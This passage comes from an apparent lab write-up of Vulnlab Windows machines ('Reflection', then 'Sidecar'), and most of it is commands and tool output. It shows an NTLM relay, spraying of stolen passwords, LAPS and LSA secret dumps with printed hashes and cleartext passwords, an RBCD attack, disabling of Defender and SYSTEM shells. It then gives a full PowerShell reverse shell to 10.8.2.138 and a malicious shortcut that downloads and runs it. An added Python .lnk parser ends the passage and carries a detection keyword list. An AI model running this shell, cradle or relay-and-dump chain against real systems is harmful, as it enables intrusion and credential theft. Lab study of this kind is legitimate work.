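        # MIC present: protects the negotiate flags from tampering; it does not
        # stop relaying to a target that does not require signing.
        "mic_present": bool(av.get("MsvAvFlags", 0) & 0x2),
        # A fixed, non-random server challenge is impacket's default and a
        # fingerprint of the rogue server on the wire.
        "static_server_challenge": parsed["server_challenge"] == "aaaaaaaaaaaaaaaa",
    }


if __name__ == "__main__":
    p = parse_ntlmv2_response(CAPTURED)
    print(p["user"], p["domain"], p["timestamp"].isoformat())
    for k, v in p["av_pairs"].items():
        print("  %-22s %s" % (k, v))
    print(relay_indicators(p))
```

The NetBIOS and DNS names in the AV pairs (DuHrDNCn, rKCeRPQV) are the random names our impacket server advertised in its CHALLENGE message; the client copies the server's target info into its response and adds MsvAvTargetName, flags and channel bindings itself.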

Next we do an NTLM relay attack against dc01.reflection.vl (10.10.203.133). This works because DC01 does not require SMB signing (the crackmapexec banner later reports signing:False); the -i flag makes ntlmrelayx open an interactive SMB shell on the target with the relayed session instead of dumping hashes.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.203.133 -i
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.203.134, attacking target smb://10.10.203.133
[*] Authenticating against smb://10.10.203.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-9 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-11 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!

We trigger the authentication again from our SQL shell:

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

and in another terminal window on my Kali box, connect to the interactive shell ntlmrelayx opened on 127.0.0.1:11000:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ nc 127.0.0.1 11000                     
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# use prod
# ls
drw-rw-rw-          0  Wed Jun  7 19:44:26 2023 .
drw-rw-rw-          0  Wed Jun  7 19:43:22 2023 ..
-rw-rw-rw-         45  Thu Jun  8 13:24:39 2023 prod_db.conf
# get prod_db.conf
# 

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat prod_db.conf 
user=web_prod
password=Tr<redacted>01
db=prod

Spray the prod password against MSSQL on DC01 with --local-auth (SQL logins rather than domain accounts); it is valid for web_prod:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec mssql dc01.reflection.vl -u names.txt -p 'Tr<redacted>01' --local-auth --continue-on-success
MSSQL       dc01.reflection.vl 1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:DC01)
MSSQL       dc01.reflection.vl 1433   DC01             [+] web_prod:Tribesman201 
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'web_staging'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Administrator'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Guest'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user ''.

sqsh to dc01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ sqsh -S 10.10.203.133 -U 'web_prod' -P 'Tr<redacted>01'

sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> use prod;
2> go
1> select * from users;
2> go -m vert
id:       1
name:     abbie.smith
password: CM<redacted>Ew
 
id:       2
name:     dorothy.rose
password: hC<redacted>SJ
 
(2 rows affected)

LDAP search: collect every sAMAccountName with abbie.smith's credentials, for spraying later:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ ldapsearch -H ldap://dc01.reflection.vl -U abbie.smith -w 'CM<redacted>Ew' -b 'DC=reflection,DC=vl' "(objectClass=user)" "*" | grep sAMAccountName | cut -d " " -f 2 > domainUsers.txt
SASL/DIGEST-MD5 authentication started
SASL username: abbie.smith
SASL SSF: 128
SASL data security layer installed.

BloodHound collection:

bloodhound-python -d reflection.vl -c all -u 'abbie.smith' -p 'CM<redacted>Ew' -ns 10.10.203.133 --dns-tcp

Check the MachineAccountQuota. It is 0, so we cannot add a computer account of our own for RBCD and will have to use an existing machine account we control (MS01$, once we own MS01):

──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "dorothy.rose" -p "hC<redacted>SJ" -M maq
SMB         dc01.reflection.vl 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        dc01.reflection.vl 389    DC01             [+] reflection.vl\dorothy.rose:hC_fny3OK9glSJ 
MAQ         dc01.reflection.vl 389    DC01             [*] Getting the MachineAccountQuota
MAQ         dc01.reflection.vl 389    DC01             MachineAccountQuota: 0

Read the LAPS password: abbie.smith has GenericAll on MS01, which includes the right to read ms-Mcs-AdmPwd:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "abbie.smith" -p "CM<redacted>Ew" -M laps 
SMB         DC01            445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        DC01            389    DC01             [+] reflection.vl\abbie.smith:CMe1x+nlRaaWEw 
LAPS        DC01            389    DC01             [*] Getting LAPS Passwords
LAPS        DC01            389    DC01             Computer: MS01$                Password: H44<redacted>}xi

Check which local accounts accept the LAPS password. The command targets ws01.reflection.vl, but the banner shows the answering host is MS01, so this is MS01's local Administrator:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ws01.reflection.vl -u domainUsers.txt -p "H447<redacted>}xi" --continue-on-success --local-auth
SMB         ws01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         ws01.reflection.vl 445    MS01             [+] MS01\Administrator:H4<redacted>xi (Pwn3d!)
SMB         ws01.reflection.vl 445    MS01             [-] MS01\Guest:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [-] MS01\labadm:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\DC01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\krbtgt:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\MS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\WS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] 

Secretsdump with that account (the $MACHINE.ACC entry confirms the host is MS01). The cached domain logons include Georgia.Price, and the LSA secrets reveal the svc_web_staging service password:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump 'ms01/administrator:H4<redacted>xi@ws01.reflection.vl' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:38<redacted>9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-18 08:18:23)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:f8f1905251e52be2e3c280efa37d6595579baa14e7e22dcdc776e76cc08fbf72
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:b5572db5a79c069d564c0da3a7543ea0
REFLECTION\MS01$:des-cbc-md5:04340497ef8c2a31
REFLECTION\MS01$:plain_password_hex:58dc1407b76528658a71020f1bf3d26064f983ffb68ceaf6bf9781a33691791f5bb668717a5f094f71569c6b7ec629d2de911675b1d9105ebfb4fc23685385d364c0314354dadf9ed521b11413d19736edde2de06ab91c18032498f613bafa4be0dda4e394e0af1c9fca8210462ab2108331bfdfe3995f1812bc0973e63da4e3487260b5dd118ef0289e952c94b60687858a13dd81a5316984af040d66409529b44c1bf0873747f2a27ee115eba71811d33b1bdd12fcf8978ae91239e9b22c026aac009f81f5bdd44a7fb9e491af455014bf4e99cd9cc0ddab2eb5bf243eb6f578e62eb542fb9751907a6bf581d535dc
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:076ebd94d605cdbf46f0bae7f55d62dc:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

We use the local Administrator account to RDP to MS01 and start enumerating it:

xfreerdp /f /u:administrator /p:'H44<redacted>}xi' /v:ms01.reflection.vl /cert:ignore /rfx 

On MS01, disable Defender, upload mimikatz.exe and dump the credential vault; this gives Georgia.Price's password:

Georgia.Price
DBl<redacted>id

RBCD attack on ws01.reflection.vl (via MS01). The DC IP has changed since the first dump (10.10.243.69 now) and MS01$'s NT hash differs from the earlier dump, so dump MS01 again to get the current machine-account hash:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@ms01.reflection.vl  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password: H44<redacted>xi

[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3819a8ecec5fd33f6ecb83253b24309a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-19 09:43:54)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:dd7df26c646dc3eab4947b81af5700127a622d4480bf217755f9b9b072f6aa1d
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:c400497cd92b4b41c6a00b44f287830b
REFLECTION\MS01$:des-cbc-md5:7943755b4f326449
REFLECTION\MS01$:plain_password_hex:37e2dea970915b066f2d2b35806a0f22d10e6335a1fbee73db06f02d679b2dca0ad0a9cf9583bac1f56594df8af7494eba5c7609ddd0ac303af48b4a585f7a618b4596f241b70142d18fa970a0678ff066d41cb3ff4ee3cedf81083c64b2c1925a28fb39fd0d87172f8ae1c86fa23ab6d26068c0ace2cc2a566dae4c1581515af8c7273f5bd181eec8de2f9db0f06a8a2c4f6395d30b5e3872cde5fc21cbc0213bb59f241a3fb3bff601de5cbe893192f64310a564497307f12935a316340625e74441f689489c17fe9e6550426b27890830a261edec4a5005652878a2e47830eec7e5bb5b42772438e100f7f935d755
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:c1658a71853a7f23f7ff13cd1c7ee10a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 

Georgia.Price has GenericAll on WS01, so first read WS01$'s msDS-AllowedToActOnBehalfOfOtherIdentity; it is empty:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -delegate-to 'ws01$' -dc-ip dc01.reflection.vl -action 'read' reflection.nl/Georgia.Price:'DB<redacted>id'


Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty

Then write MS01$ into it, so that MS01$ may impersonate users to services on WS01 through S4U2Proxy:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.243.69 "Reflection/Georgia.Price:DB<redacted>id" 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)

With MS01$'s NT hash, request a service ticket for cifs/WS01.reflection.vl as Administrator (S4U2Self followed by S4U2Proxy) and point KRB5CCNAME at it:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-getST -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.243.69 'Reflection/MS01$' -hashes ':c1658a71853a7f23f7ff13cd1c7ee10a'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ export KRB5CCNAME=Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache  

Then a Kerberos-authenticated secretsdump against WS01.reflection.vl with that ticket. Besides the SAM, WS01 keeps an autologon DefaultPassword for Rhys.Garner in its LSA secrets:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@WS01.reflection.vl -k -no-pass 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2<redacted>02:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::
labadm:1001:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/Rhys.Garner:$DCC2$10240#Rhys.Garner#99152b74dac4cc4b9763240eaa4c0e3d: (2023-06-08 11:17:05)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\WS01$:plain_password_hex:55005c003f00240038003f0036005b004800350078006e007a0056003a004d003600490038003d0042005b005200340067006f006c003000580060007a00430045002600590021004e00780021004800380064004000260046005d0057007a005e005b006600320073002000380076005800310026006e0078006d002a007800530059006400670075002a002800730036003f0062006200240069005b004a005d006e0021006d0020004f0060003e0061006b002600360045004b007300320075006100390069002b007300290062005e0027006c0042004a005c005500600066002f003e002200430041003b004800
REFLECTION\WS01$:aad3b435b51404eeaad3b435b51404ee:b7728f2d275eb4ff1f6e30692b16c7a1:::
[*] DefaultPassword 
reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uP
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe7b434bbb2fe36946ecafdfab07d4396c039c6e8
dpapi_userkey:0xf772db3cfa86d2d96caf0fc57946c6e7c17511eb
[*] NL$KM 
 0000   DE AA F4 50 81 29 7C 82  0D 6F F2 2D 08 8B A2 7A   ...P.)|..o.-...z
 0010   7D 46 9F 66 C3 8F D4 9A  FA DB D2 9D 56 9A 79 28   }F.f........V.y(
 0020   10 1F 8F 40 B4 EB 04 6F  42 8F 37 02 7E E5 85 93   ...@...oB.7.~...
 0030   00 9C 28 46 DE 39 3F BB  78 90 E7 C8 AB 3A 75 D1   ..(F.9?.x....:u.
NL$KM:deaaf45081297c820d6ff22d088ba27a7d469f66c38fd49afadbd29d569a7928101f8f40b4eb046f428f37027ee58593009c2846de393fbb7890e7c8ab3a75d1
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

With WS01's local Administrator NT hash we can run commands as SYSTEM through atexec:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "whoami"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \yVNLerVO
[*] Running task \yVNLerVO
[*] Deleting task \yVNLerVO
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
nt authority\system

Disable Defender real-time monitoring the same way:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \AvHKoFmN
[*] Running task \AvHKoFmN
[*] Deleting task \AvHKoFmN
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp

and get an interactive SYSTEM shell with psexec:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-psexec administrator@WS01.reflection.vl -hashes ':a2<redacted>02' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on WS01.reflection.vl.....
[*] Found writable share ADMIN$
[*] Uploading file YQydtkPz.exe
[*] Opening SVCManager on WS01.reflection.vl.....
[*] Creating service dvqZ on WS01.reflection.vl.....
[*] Starting service dvqZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>    

--
c:\Users\Rhys.Garner\Desktop> type flag.txt
VL{ba<redacted>eb}

Rhys.Garner's password is reused by DOM_RGARNER, a member of Domain Admins, so it gives WinRM access to DC01:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ evil-winrm --ip dc01.reflection.vl -u 'dom_rgarner' -p 'kn<redacted>uP'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\dom_rgarner\Documents> dir
*Evil-WinRM* PS C:\Users\administrator\desktop> dir


    Directory: C:\Users\administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/8/2023   4:24 AM             36 flag.txt


*Evil-WinRM* PS C:\Users\administrator\desktop> type flag.txt
VL{05<redacted>17}
*Evil-WinRM* PS C:\Users\administrator\desktop> 

That’s all.


vulnlab-sidecar

a very hard Windows machine

Preparing the PowerShell reverse shell (saved as puckshell.txt and fetched over HTTP later)

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ cat puckshell.txt
function cleanup {
    # Tear down the socket and the child cmd.exe, then exit the script
    if ($client.Connected -eq $true) { $client.Close() }
    if ($null -ne $process.ExitCode) { $process.Close() }
    exit
}
# Attacker IP and port (the nc listener)
$address = '10.8.2.138'
$port = '443'
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect($address, $port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
# Spawn cmd.exe with redirected stdin/stdout so the socket can be pumped through it
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\Windows\System32\cmd.exe'
$process.StartInfo.RedirectStandardInput = $true
$process.StartInfo.RedirectStandardOutput = $true
$process.StartInfo.UseShellExecute = $false
$process.Start() | Out-Null
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = New-Object System.Text.AsciiEncoding
# Send the banner and prompt cmd.exe printed on startup
while ($outputstream.Peek() -ne -1) { $out += $encoding.GetString($outputstream.Read()) }
$stream.Write($encoding.GetBytes($out), 0, $out.Length)
$out = $null; $done = $false
while (-not $done) {
    if ($client.Connected -ne $true) { cleanup }
    # Read one line (up to LF) from the socket; a zero-length read means the peer closed
    $pos = 0; $i = 1
    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
        $read = $stream.Read($networkbuffer, $pos, $networkbuffer.Length - $pos)
        if ($read -le 0) { break }
        $pos += $read
        if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) { break }
    }
    if ($pos -gt 0) {
        # Feed the line to cmd.exe, then relay whatever it printed back to the socket
        $string = $encoding.GetString($networkbuffer, 0, $pos)
        $inputstream.Write($string)
        Start-Sleep 1
        if ($null -ne $process.ExitCode) { cleanup }
        else {
            $out = $encoding.GetString($outputstream.Read())
            while ($outputstream.Peek() -ne -1) {
                $out += $encoding.GetString($outputstream.Read())
                if ($out -eq $string) { $out = '' }   # drop the echoed command line
            }
            $stream.Write($encoding.GetBytes($out), 0, $out.Length)
            $out = $null
            $string = $null
        }
    } else { cleanup }
}


Create a malicious shortcut (.lnk) on a Windows PC whose target downloads and runs that script. As the shortcut target I used:

powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://10.8.2.138/puckshell.txt')))
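The shortcut above was created on a Windows PC, so the writeup does not show its bytes. The following added example (my own code, not the author's tooling) implements the parts of the MS-SHLLINK format needed to look inside such a file: it reads the ShellLinkHeader, skips the LinkTargetIDList and LinkInfo structures that shortcuts made on Windows carry, and extracts the StringData fields, which is what a defender triaging Common.lnk, Install.lnk or Transfer.lnk on a share wants, then flags targets or arguments that invoke PowerShell download cradles, or icons on a UNC path (which make Explorer authenticate to the attacker when the folder is rendered). The builder writes header plus StringData only; that Explorer resolves such a RelativePath-only shortcut is an assumption here, and the builder's purpose is producing a fixture for the parser.

```python
import struct

# ShellLinkHeader constants (MS-SHLLINK 2.1)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_IDLIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7          # window state attackers pick to keep the console hidden
FILE_ATTRIBUTE_NORMAL = 0x80

# Substrings that warrant a closer look when found in a shortcut's target/arguments/icon
SUSPICIOUS = ("powershell", "iex", "downloadstring", "downloaddata", "-enc",
              "cmd.exe /c", "mshta", "rundll32", r"\\")


def _string_data(s: str) -> bytes:
    """StringData item: UTF-16LE char count (no terminator) followed by the characters."""
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path: str, arguments: str, icon_location: str = "",
              show_cmd: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Minimal shortcut: 76-byte header + RelativePath/Arguments[/IconLocation] StringData.
    No IDList/LinkInfo is written (assumption: that is enough for this fixture)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    if icon_location:
        flags |= HAS_ICON_LOCATION
    header = struct.pack("<I16sIIQQQIiIHHII",
                         0x4C, LNK_CLSID, flags, FILE_ATTRIBUTE_NORMAL,
                         0, 0, 0,                # creation/access/write FILETIME (unset)
                         0, 0, show_cmd,         # FileSize, IconIndex, ShowCommand
                         0, 0, 0, 0)             # HotKey, Reserved1..3
    body = _string_data(relative_path) + _string_data(arguments)
    if icon_location:
        body += _string_data(icon_location)
    return header + body


def parse_lnk(data: bytes) -> dict:
    """Decode header flags and StringData; skips IDList/LinkInfo so real shortcuts parse too."""
    size, clsid, flags, _attrs, _ct, _at, _wt, _fsize, _icon_idx, show_cmd = \
        struct.unpack_from("<I16sIIQQQIiI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    pos = 0x4C
    if flags & HAS_LINK_TARGET_IDLIST:           # IDListSize (2 bytes) + IDList
        (idlist_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        (info_size,) = struct.unpack_from("<I", data, pos)
        pos += info_size
    unicode = bool(flags & IS_UNICODE)
    fields = {"flags": flags, "show_command": show_cmd}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            (count,) = struct.unpack_from("<H", data, pos)
            pos += 2
            nbytes = count * 2 if unicode else count
            fields[name] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
            pos += nbytes
    return fields


def flag_suspicious(fields: dict) -> list:
    """Return the SUSPICIOUS markers present in target, arguments or icon location."""
    text = " ".join(fields.get(k, "") for k in ("relative_path", "arguments", "icon_location")).lower()
    return [m for m in SUSPICIOUS if m in text]


if __name__ == "__main__":
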